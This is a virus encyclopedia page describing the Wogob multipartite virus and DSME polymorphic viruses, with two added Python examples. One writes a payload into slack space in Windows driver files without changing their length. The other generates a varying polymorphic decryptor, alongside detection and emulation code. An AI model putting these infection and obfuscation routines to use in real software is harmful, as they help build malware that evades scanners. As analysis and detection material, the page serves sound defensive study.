Virus Database


Wogob

Description Wogob

This is a multipartite virus that infects MS Word documents and Windows 95/98 VxD drivers. It spreads in several stages. When an infected document is edited in Word, the virus's Word macro creates and executes a PE dropper (Portable Executable is the format of Win32 executable files). The PE dropper looks for the VxD drivers installed in the system and infects them. When an infected VxD driver is loaded, it hooks the file access system calls, and when Word documents are opened it infects them with a copy of the virus.
So the virus passes through three stages before returning to its starting form: Word document -> PE dropper -> VxD driver -> Word document. This infection mechanism resembles that of the "Navrhar" multipartite virus, but the two viruses are implemented differently.
The virus contains the "copyright" text:
WG05 Copyright(C) 1995-1998 by WoodGoblin. With thanks to Jacky Qwerty.

From Word document to Windows memory
The infected documents carry the auto-macro AutoClose, which gets control when the affected document is closed. First the virus checks whether it is already present in the system by testing for the file C:\FUCK.YOU. If that file is reported as present, the macro does nothing and returns control. Otherwise the infection routine runs: it builds the PE dropper (stored as constant strings in the macro code), writes it to a file with a random name and the .WG5 extension, and executes it.
The PE dropper runs as an ordinary Windows application and therefore has access to all the Windows functions it needs. It looks for the VxD files registered in the system and infects them: first the VxDs listed under the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD, of which it infects those marked as StaticVxD, then the VxDs referenced in the [386Enh] section of SYSTEM.INI on the "Device=", "Mouse=" and "Display=" lines.
To infect a driver the virus parses the VxD file format (LE, linear executable), looks for a "cave" between the file's sections ("objects" in LE terminology), and writes its code into the cave if one large enough is found. As a result infected VxD files do not grow in size, so a file-length check will not reveal the infection. The virus then makes the necessary changes in the VxD header: it increases the length of the affected object and modifies the relocation tables so that the loader passes control to the virus entry point when the infected VxD is loaded into Windows memory.
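The cave search in the LE object table, as an added example that is not Wogob's code and not part of the original description. It reads the LE header fields that locate each object's data (MZ stub, "LE" signature at e_lfanew, page size and bytes-on-last-page at 0x28, object table offset and count at 0x40, data pages offset at 0x80, 24-byte object entries) and assumes the common VxD layout in which an object's pages are stored contiguously in page order, so the page map is not consulted. The sample driver image is constructed inline; place_in_cave mirrors only the write-into-slack and length-bump steps described above, not the fixup and entry-point changes, and changed_objects is the check to run instead of comparing file lengths, which this infection leaves unchanged.

```python
import struct

OBJ_ENTRY = struct.Struct("<6I")   # vsize, reloc base, flags, page map index, page count, reserved


def parse_le(data):
    """Read the LE header fields needed to locate each object's data pages."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ stub")
    hdr = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew -> LE header
    if data[hdr:hdr + 2] != b"LE":
        raise ValueError("not a linear executable")
    num_pages = struct.unpack_from("<I", data, hdr + 0x14)[0]
    page_size, last_page = struct.unpack_from("<II", data, hdr + 0x28)
    obj_off, obj_cnt = struct.unpack_from("<II", data, hdr + 0x40)  # offset is relative to LE header
    pages_off = struct.unpack_from("<I", data, hdr + 0x80)[0]       # absolute file offset of page data
    objects = []
    for i in range(obj_cnt):
        vsize, base, flags, pidx, pcnt, _ = OBJ_ENTRY.unpack_from(data, hdr + obj_off + OBJ_ENTRY.size * i)
        objects.append({"vsize": vsize, "base": base, "flags": flags, "page_idx": pidx, "page_cnt": pcnt})
    return {"hdr": hdr, "num_pages": num_pages, "page_size": page_size, "last_page": last_page,
            "obj_off": obj_off, "pages_off": pages_off, "objects": objects}


def object_extent(info, obj):
    """File range [start, end) backing an object. Assumes the usual VxD layout
    where an object's pages sit contiguously in page order (page map not consulted)."""
    if obj["page_cnt"] == 0:
        return None
    start = info["pages_off"] + (obj["page_idx"] - 1) * info["page_size"]
    last_idx = obj["page_idx"] + obj["page_cnt"] - 1
    tail = info["last_page"] if last_idx == info["num_pages"] else info["page_size"]
    return start, start + (obj["page_cnt"] - 1) * info["page_size"] + tail


def find_caves(data):
    """(object index, cave offset, cave length) for every object whose file-backed
    pages extend beyond its declared virtual size: the slack the virus looks for."""
    info = parse_le(data)
    caves = []
    for i, obj in enumerate(info["objects"]):
        extent = object_extent(info, obj)
        if extent is None:
            continue
        start, end = extent
        used_end = start + obj["vsize"]
        if used_end < end:
            caves.append((i, used_end, end - used_end))
    return caves


def place_in_cave(data, obj_index, payload):
    """Write payload into an object's cave and grow that object's virtual size to
    cover it; the file length does not change. Fixup and entry-point edits are
    not modelled."""
    info = parse_le(data)
    caves = {i: (off, length) for i, off, length in find_caves(data)}
    if obj_index not in caves or caves[obj_index][1] < len(payload):
        raise ValueError("no cave large enough")
    off = caves[obj_index][0]
    out = bytearray(data)
    out[off:off + len(payload)] = payload
    entry = info["hdr"] + info["obj_off"] + OBJ_ENTRY.size * obj_index
    struct.pack_into("<I", out, entry, info["objects"][obj_index]["vsize"] + len(payload))
    return bytes(out)


def changed_objects(clean, suspect):
    """Indices of objects whose virtual size differs between two images of the
    same driver: the check to run instead of comparing file lengths."""
    a, b = parse_le(clean)["objects"], parse_le(suspect)["objects"]
    return [i for i, (x, y) in enumerate(zip(a, b)) if x["vsize"] != y["vsize"]]


def build_sample_vxd():
    """Constructed two-object LE image (not a real driver): a 0x1234-byte code
    object spanning two 4 KiB pages, so 0xDCC bytes of slack follow it, and a
    0x300-byte data object that forms the file's short last page."""
    hdr, obj_off, pages_off, page_size = 0x40, 0xC0, 0x1000, 0x1000
    objects = [(0x1234, 0x1000, 0x5, 1, 2), (0x300, 0x3000, 0x3, 3, 1)]
    img = bytearray(pages_off)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, hdr)
    img[hdr:hdr + 2] = b"LE"
    struct.pack_into("<I", img, hdr + 0x14, 3)                      # pages in file
    struct.pack_into("<II", img, hdr + 0x28, page_size, 0x300)      # page size, bytes on last page
    struct.pack_into("<II", img, hdr + 0x40, obj_off, len(objects))
    struct.pack_into("<I", img, hdr + 0x80, pages_off)
    for i, (vsize, base, flags, pidx, pcnt) in enumerate(objects):
        OBJ_ENTRY.pack_into(img, hdr + obj_off + OBJ_ENTRY.size * i, vsize, base, flags, pidx, pcnt, 0)
    img += b"\x90" * 0x1234 + bytes(0x2000 - 0x1234)   # object 1 code, then zero-filled slack
    img += bytes(0x300)                                  # object 2, the short last page
    return bytes(img)


if __name__ == "__main__":
    clean = build_sample_vxd()
    stub = (b"\xe9\x00\x00\x00" + b"C:\\RANDOM.WG5\x00").ljust(100, b"\xcc")  # constructed stand-in stub
    infected = place_in_cave(clean, 0, stub)
    print("caves before:", [(i, hex(o), hex(n)) for i, o, n in find_caves(clean)])
    print("caves after: ", [(i, hex(o), hex(n)) for i, o, n in find_caves(infected)])
    print("same length:", len(clean) == len(infected), "changed objects:", changed_objects(clean, infected))
```

Run against a real Win95 VxD, find_caves shows how much zero-filled slack each object carries; a driver whose object table differs from a known-good copy while its length is identical is exactly the pattern this infection produces.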
From VxD file to Word documents
Into each infected VxD the virus writes only a small stub, about 100 bytes of code followed by the PE dropper's file name. When this stub gets control, it allocates a block of memory, reads the complete virus code from the PE dropper into that memory, and jumps to it. Because the driver stub holds only the dropper's name and not the virus body, the .WG5 dropper must still be present on disk for the resident part to start. The virus then hooks the IFS API (file access calls) and stays resident in Windows memory as a VxD driver.
The virus's IFS API handler intercepts several functions: file open, file close, file search, and get/set file attributes. When a .DOC file is opened, the virus records its name and infects it when the file is closed. It does not infect .DOC files on local hard drives, only those on remote (network) and floppy drives.
To infect a document the virus parses the Word binary document format, creates a macro stream and writes its macro code into it. The virus also carries the code of the "Word.CAP" macro virus and in some cases infects documents with that macro virus.
Depending on a random value, the virus corrupts .WAD files when they are opened.
The get/set file attributes hook serves as the virus's "are you there" check: the resident handler completes attribute requests for the FUCK.YOU file itself, so the AutoClose macro's test for that file succeeds whenever the virus is already loaded in memory.
The file search hook is used for stealth: the handler skips .WG5 files (the virus PE dropper) in search results, so the system never lists them, and it reports the length of infected .DOC files reduced to their original, pre-infection size.


DSCE.Demo.2941

Description DSCE.Demo.2941

It is a harmless memory-resident parasitic virus. It hooks INT 21h and writes itself to the end of COM and EXE files as they are executed. It contains the internal text string:
This is a DSCE's Demo Virus written by [P.F]

DSME-based Viruses

Description DSME-based Viruses

DSME (Dark Slayer's Mutating Engine) is a polymorphic generator of the same kind as the MtE or TPE engines. On each infection it generates a new decryption routine and encrypts the virus body to match; the virus then writes this decryptor and the encrypted body to the target file, so the body never appears as a constant byte sequence in infected files. The generator contains the internal string: "DSME v1.0".
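A miniature of the mechanism described above, as an added example that is not DSME's code and not from the original description: a generator that emits a different 16-bit decryptor each time (register, operation, key and junk NOPs chosen at random, using the standard x86 encodings of mov reg,imm16; 80 /digit ib; inc reg; loop rel8) in front of the encrypted body, together with the generic-decryption step a scanner uses against such engines, namely stepping the decryptor in an emulator until its loop falls through and then examining the bytes it leaves behind. The instruction template, the constructed body and the load address (CS:0100h as for a COM file) are assumptions made for illustration; a real engine permutes far more than this.

```python
import random

LOAD_BASE = 0x100  # COM programs are loaded at CS:0100h (assumed load address)
# 16-bit x86 encodings the toy engine chooses from (standard opcodes):
# register -> (mov reg,imm16 opcode, inc reg opcode, ModRM r/m field for [reg])
REGS = {"si": (0xBE, 0x46, 4), "di": (0xBF, 0x47, 5), "bx": (0xBB, 0x43, 7)}
# operation -> (ModRM /digit for "80 /digit ib", inverse applied when encrypting)
OPS = {"xor": (6, lambda b, k: b ^ k),
       "add": (0, lambda b, k: (b - k) & 0xFF),
       "sub": (5, lambda b, k: (b + k) & 0xFF)}


def generate(body, rng):
    """Emit a fresh decryptor followed by the encrypted body. Register, operation,
    key and junk-NOP padding are chosen per call, so each sample differs while
    decrypting to the same body (the MtE/TPE/DSME idea in miniature)."""
    reg, op, key = rng.choice(sorted(REGS)), rng.choice(sorted(OPS)), rng.randrange(1, 256)
    mov_r, inc_r, rm = REGS[reg]
    digit, encrypt = OPS[op]
    pre = [0x90] * rng.randrange(0, 4)                         # junk before the loop
    loop = [0x80, (digit << 3) | rm, key] + [0x90] * rng.randrange(0, 3) + [inc_r]
    size = len(pre) + 3 + 3 + len(loop) + 2                    # mov reg; mov cx; loop body; loop
    body_addr = LOAD_BASE + size
    code = (pre + [mov_r] + list(body_addr.to_bytes(2, "little"))
            + [0xB9] + list(len(body).to_bytes(2, "little"))
            + loop + [0xE2, (-(len(loop) + 2)) & 0xFF])        # loop back to start of loop body
    return bytes(code) + bytes(encrypt(b, key) for b in body)


def emulate(image, max_steps=1_000_000):
    """Generic decryption as a scanner does it: step the decryptor in a minimal
    16-bit interpreter until the loop falls through, then return the bytes it
    left where the body was. Raises on anything outside the modelled subset."""
    mem = bytearray(0x10000)
    mem[LOAD_BASE:LOAD_BASE + len(image)] = image
    regs = {"si": 0, "di": 0, "bx": 0, "cx": 0}
    by_mov = {v[0]: r for r, v in REGS.items()}
    by_inc = {v[1]: r for r, v in REGS.items()}
    by_rm = {v[2]: r for r, v in REGS.items()}
    ip, count = LOAD_BASE, 0
    for _ in range(max_steps):
        op = mem[ip]
        if op == 0x90:                                   # nop
            ip += 1
        elif op in by_mov:                               # mov reg, imm16
            regs[by_mov[op]] = int.from_bytes(mem[ip + 1:ip + 3], "little")
            ip += 3
        elif op == 0xB9:                                 # mov cx, imm16
            regs["cx"] = count = int.from_bytes(mem[ip + 1:ip + 3], "little")
            ip += 3
        elif op == 0x80 and (mem[ip + 1] >> 6) == 0:     # 80 /digit ib on byte [reg]
            modrm, imm = mem[ip + 1], mem[ip + 2]
            addr, digit = regs[by_rm[modrm & 7]], (modrm >> 3) & 7
            b = mem[addr]
            mem[addr] = {6: b ^ imm, 0: (b + imm) & 0xFF, 5: (b - imm) & 0xFF}[digit]
            ip += 3
        elif op in by_inc:                               # inc reg
            regs[by_inc[op]] = (regs[by_inc[op]] + 1) & 0xFFFF
            ip += 1
        elif op == 0xE2:                                 # loop rel8
            regs["cx"] = (regs["cx"] - 1) & 0xFFFF
            rel = mem[ip + 1] - (256 if mem[ip + 1] > 127 else 0)
            ip += 2
            if regs["cx"] == 0:
                return bytes(mem[ip:ip + count])         # fell through: body is in the clear
            ip += rel
        else:
            raise ValueError(f"unmodelled opcode {op:02x} at {ip:04x}")
    raise ValueError("decryptor did not terminate")


def make_samples(body, n):
    """n independently generated infections of the same body, seeded for reproducibility."""
    return [generate(body, random.Random(seed)) for seed in range(n)]


BODY = b"constructed stand-in virus body " + bytes(range(64))  # not real virus code

if __name__ == "__main__":
    for s in make_samples(BODY, 4):
        print(s[:20].hex(), "decrypts ok:", emulate(s) == BODY, "plain body visible:", BODY in s)
```

A plain byte signature taken from the body never matches a sample, and the decryptor bytes change from sample to sample; what stays constant is the behaviour, which is why scanners of that era moved to emulation for MtE, TPE and DSME families.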
DSME.Apex
It is a not dangerous, non-memory-resident parasitic virus. It searches for .COM files and writes itself to their ends. In September it manifests itself with sound and video effects and displays the text string:
My name is APEX v1.0_ Congratulations! PS:I wouldn't hurt your data.Be relax!.Ha

DSME.Connie
These are harmless memory-resident parasitic polymorphic viruses. They are not generated with the DSME engine but contain DSME-related polymorphic code; they look like "rough copies" of the DSME generator.
These viruses hook INT 21h and write themselves to the end of COM files as they are accessed. They contain the internal text string "C:\COMMAND.COM" and:
"DSME.Connie.1746": This is
Written by Dark Slayer in Keelung TAIWAN
"DSME.Connie.2708": This is Connie v2.0
Written by Dark Slayer in Keelung, Taiwan

DSME.DemoVirus
It is a harmless, non-memory-resident parasitic DSME-based virus. It searches for .COM files and writes itself to their ends. It contains the internal text:
This is a DemoVirus for DSME v1.0, Written by Dark Slayer in Keelung,Taiwan

DSME.Teacher
It is a harmless memory-resident parasitic DSME-based virus. It hooks INT 21h and writes itself to the end of COM and EXE files as they are executed. It contains the internal text string:
Teacher virus ( A demo virus for DSME to all teacher )


Copyright © 2005 Virus-Database.com